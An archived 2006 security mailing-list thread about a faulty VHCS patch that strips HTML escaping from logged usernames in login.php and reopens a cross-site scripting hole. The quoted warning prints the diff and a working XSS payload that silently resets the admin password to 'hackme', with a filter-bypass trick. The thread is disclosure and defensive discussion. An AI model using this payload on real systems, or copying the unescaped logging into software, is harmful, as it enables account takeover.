lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <43E6874E.7060308@rs-labs.com>
Date: Sun Feb  5 23:16:46 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: Re: VHCS Security Patch - 2006-02-05 --> Fake!

Hi Alex,

My apologies if I've been a bit rough, but public security mailing-lists
are intended to deal with (un)security issues. I don't understand why
you didn't announce in mls the issue if a new vuln was being fixed. It
seemed some kind of joke or hack, since I missed the "die()" function
and I only saw security fixes being removed, so it was suspicious. I
decided to go public because people could be downloading wrong patch.

I didn't have time to analyze the effects of die() line there. I suppose
that's the real fix, isn't it? Could you elaborate on that? What's the
real vuln being fixed?

Sorry for the inconvenience. No offense was intended.

Cheers,
-Roman


Alexander Kotov [moleSoftware] wrote:
> Hi Roman,
> 
> uffff ... I'm human being and make mistakes. I just got older version of
> the file.
> Now I rebuilded the tarball and the problem is fixed.
> 
> I think it is not necessary to post such kind of messages in public
> mailinglists
> before you contact someone of the development team and wait at least
> some hours.
> 
> cheers
> Alex
> 
> 
> Roman Medina-Heigl Hernandez wrote:
> 
>> Hi,
>>
>> I've just visited VHCS main page and noticed the following "security
>> patch":
>>
>> http://vhcs.net/new/modules/news/article.php?storyid=23
>>
>> It reads:
>>
>> "This patch is for all VHCS versions.
>> You have to update only one GUI file - /vhcs2/gui/include/login.php
>>
>> Just replace the file
>> "
>>
>> Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your
>> VHCS installation vulnerable to a high severity cross-site-scripting
>> issue!
>>
>> See it:
>> login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
>> login_new_unix.php  --> login.php from "security patch"
>>
>> roman@...labs:~$ diff login_orig_unix.php login_new_unix.php
>> 38c38
>> <               write_log("Login error, <b><i>".htmlspecialchars($uname,
>> ENT_QUOTES, "UTF-8")."</i></b> unknown username");
>> ---
>>  
>>
>>>              write_log("Login error, <b><i>".$uname."</i></b> unknown
>>>   
>>
>> username");
>> 75c75
>> <
>> write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
>> is not OK - user can not login");
>> ---
>>  
>>
>> write_log( $uname." Domain status is not OK - user can not login");
>> 104c104
>> <                       write_log( htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." user logged in.");
>> ---
>>  
>>
>>>                      write_log( $uname." user logged in.");
>>>   
>>
>> 112c112
>> <               write_log( htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." bad password login data.");
>> ---
>>  
>>
>>>              write_log( $uname." bad password login data.");
>>>   
>>
>> 190c190
>> <                       write_log(htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." user session timed out");
>> ---
>>  
>>
>>>                      write_log($uname." user session timed out");
>>>   
>>
>> 199c199
>> <               write_log(htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." bad session data.");
>> ---
>>  
>>
>>>              write_log($uname." bad session data.");
>>>   
>>
>> 258a259
>>  
>>
>>>      die();
>>>   
>>
>> 261a263
>>  
>>
>>> }
>>>   
>>
>> 437c439
>> < }
>> ---
>>  
>>
>>> //}
>>>   
>>
>> roman@...labs:~$
>>
>>
>> As you can see, the "patch" removes htmlspecialchars() calls letting
>> login.php vulnerable . Nasty...
>>
>> If you apply the "patch" (or have an old VHCS install, for instance
>> version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
>> exploit it by entering the following as "username" (in the login entry
>> page):
>>
>> </form><form name="dsr" method="post"
>> action="ch%61nge_password.php"><input
>> name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
>> name="uaction"
>> value="updt_pass"></form><script>document.dsr.submit()</script>
>>
>> When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his
>> password will be set up to "hackme" :-) The %61 trick is necessary to
>> bypass some string substitution. This exploit combines the XSS bug with
>> what I see as a poor security design bug, which is letting change
>> password without supplying the old one (Alex, please, fix it in next
>> release!).
>>
>> Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply patch.
>>
>>  
>>
> 
> 

-- 

Saludos,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ